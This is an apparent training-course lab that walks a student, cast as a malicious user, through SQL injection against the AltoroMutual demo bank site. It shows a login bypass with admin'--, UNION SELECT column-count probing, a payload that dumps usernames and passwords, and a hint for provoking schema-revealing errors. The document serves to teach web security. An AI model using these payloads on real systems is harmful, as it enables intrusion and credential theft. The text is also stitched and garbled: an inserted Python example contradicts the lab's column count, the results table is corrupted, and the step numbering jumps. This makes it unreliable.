Lab 4 Steal Usernames and Passwords


You saw how SQL injection can cause an application to use unvalidated user input to either circumvent 
the application's business logic or interact with the database directly. 


In this lab we are going to learn how to use the UNION keyword, which combines the results 
of two queries. Using UNION we will be able to query the database with our own requests, 
independent of the original query. 


At the end of the lab we will have exploited the SQL injection vulnerability to retrieve all the usernames 
and passwords in the database. 


In this lab you will play the role of a malicious user. 


Lab Overview 
4.1 Find a page that lists information 
- What page lists information? 
- Does the page accept user input in any way? 
- Think about how this information is pulled from the database. 
4.2 Find the vulnerability 
- How do I manipulate the input to find a vulnerability? 
- What steps should I try to "break the system"? 
4.3 Exploit 
- What steps are required to make this happen? 
4.1 Find a page that lists information 


1. Open a Firefox browser by selecting the Mozilla Firefox icon on the desktop 








2. Enter site http://demo.testfire.net/bank/main.aspx 


NOTE: It is assumed you are logged in from the last lab. If not, 
you can log in with username=admin'-- and 
password=<anything, it doesn't matter as long as it is not null> 

3. Enter admin'-- in the username field and any password, and select the Login button 





(Screenshot: Online Banking Login form with Username admin'-- and a password entered) 








4. Select the link View Recent Transactions 





(Screenshot: AltoroMutual MY ACCOUNT menu. I WANT TO...: View Account Summary, View Recent Transactions, Transfer Funds, Search News Articles, Customize Site Language. ADMINISTRATION: View Application Values, Edit Users) 








5. In the After edit box (the starting date), enter 12/12/2010 and select the Submit button 


(Result: the Recent Transactions page reports "Admin user has no account activity") 
6. Select the Back button 


4.2 Find the vulnerability 





1. Enter a single ' in the After date field and select the Submit button 





2. Review result 

(Result: the column headers TransactionID, AccountID, Description are shown with no rows) 

We learn the site is vulnerable to SQL injection since the column 
names are shown. 


3. Select the Back button 





4. Enter 1/1/2010 union select 1 from users-- in the After field and select the Submit button 

5. Review Result 




An Error Has Occurred 


Summary: 


All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists. 


Error Message: 
System.Data.OleDb.OleDbException: All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists. 
at System.Data.OleDb.OleDbDataReader.ProcessResults(OleDbHResult hr) 
at System.Data.OleDb.OleDbDataReader.NextResult() 
at System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method) 
at System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior) 
at System.Data.OleDb.OleDbCommand.System.Data.IDbCommand.ExecuteReader(CommandBehavior behavior) 
at System.Data.Common.DbDataAdapter.FillInternal(DataSet dataset, DataTable[] datatables, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) 
at System.Data.Common.DbDataAdapter.Fill(DataSet dataSet, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) 
at System.Data.Common.DbDataAdapter.Fill(DataSet dataSet, String srcTable) 
at Altoro.RecentTransactions.BindGrid() in c:\AltoroMutual\website\bank\transaction.aspx.cs:line 70 
at Altoro.RecentTransactions.Page_Load(Object sender, EventArgs e) in c:\AltoroMutual\website\bank\transaction.aspx.cs:line 32 
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) 
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) 
at System.Web.UI.Control.OnLoad(EventArgs e) 
at System.Web.UI.Control.LoadRecursive() 
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) 





Unions are used to combine the results from two queries. The 
second query, AFTER the union, is completely in our control. 


In order to use the union, both queries must return the same number 
of columns in the select. We first need to find out how many 
columns the second query should have. 


When we input the above statement we get an error 
which lets us know that we do not have enough columns in our 
select statement. 


The malicious user will then add an additional column to the 
query with each request until they no longer see this error, 
i.e.: 

After field: 1/1/2010 union select 1,1 from users-- 
After field: 1/1/2010 union select 1,1,1 from users-- 
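The column-count rule above, and the reason the fix works, as an added example that is not part of the lab: a Python/sqlite3 model of a transactions query that concatenates the After date (an assumed query shape; the lab does not show the application's source) beside the parameterized version. The schema and rows are constructed, and SQLite concatenates strings with || rather than the + the lab uses.

```python
import sqlite3

# Constructed sample schema and rows, loosely modelled on the lab's
# transactions and users tables; not the real AltoroMutual schema.
SCHEMA = """
CREATE TABLE users (userid INTEGER, username TEXT, password TEXT);
CREATE TABLE transactions (transactionid INTEGER, accountid INTEGER,
                           description TEXT, date TEXT);
INSERT INTO users VALUES (100116014, 'jsmith', 'Demo1234'),
                         (100426016, 'admin', 'admin');
INSERT INTO transactions VALUES (1, 800000, 'Deposit', '2011-03-01');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def recent_transactions_vulnerable(conn, after):
    # Defect modelled on the lab (assumed query shape): the After date is
    # pasted into the SQL text, so a UNION typed into the form becomes part
    # of the statement the database parses.
    sql = ("SELECT transactionid, accountid, description FROM transactions "
           "WHERE date > " + after)
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        # Echoing the raw engine error is the second defect: it tells the
        # caller exactly why the UNION failed (the column count), which is
        # what the lab's one-column-at-a-time probing relies on.
        return "error: " + str(exc)


def recent_transactions_fixed(conn, after):
    # Hardened form: the date is a bound parameter. Whatever the string
    # contains is compared as one value and never parsed as SQL, so the
    # UNION text cannot reach the users table. Validating the date format
    # before running the query is a further, independent layer.
    sql = ("SELECT transactionid, accountid, description FROM transactions "
           "WHERE date > ?")
    return conn.execute(sql, (after,)).fetchall()
```

Against the vulnerable function the two-column probe returns the engine's column-count error, the three-column probe succeeds, and the same input given to the fixed function is just an odd-looking date string that matches no users row.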
6. Select the Back button 


7. Enter 1/1/2010 union select 1,1,1,1 from users-- in the After field and select the Submit button 





8. Review Result 

(Result: the column headers TransactionID, AccountID, Description are shown with a row of 1s) 

We learn that we have the right number of columns and the SQL 
injection succeeds. 
9. Select the Back button 





4.3 Exploit 


1. Enter 1/1/2010 union select userid,null,username+' '+password,null from users-- in the After field 
and select the Submit button (Note: there is a space between the two quotes) 


10. Review Results 

TransactionID  AccountID  Description 
16011é014      jsmith     Demo1234 
16021€018      sspeed     Deamollz4 
LO0SLéEO01L2   tuser      tusder 
100426016      admin      admin 
100516010      ijoe       fracian 
100616014      cclay      Ali 

We learn all the userids and passwords in the database! 


Note: How did we know to use users for the table name and that 
username and password were columns in the table? The 
malicious user could have used trial and error to find this 
information out, or, if you enter ' having 1=1-- as the username 
and anything for the password on the login page 
(http://demo.testfire.net/bank/login.aspx), you will see a VERY 
verbose error message that gives this 
information directly. 


11. Close Firefox 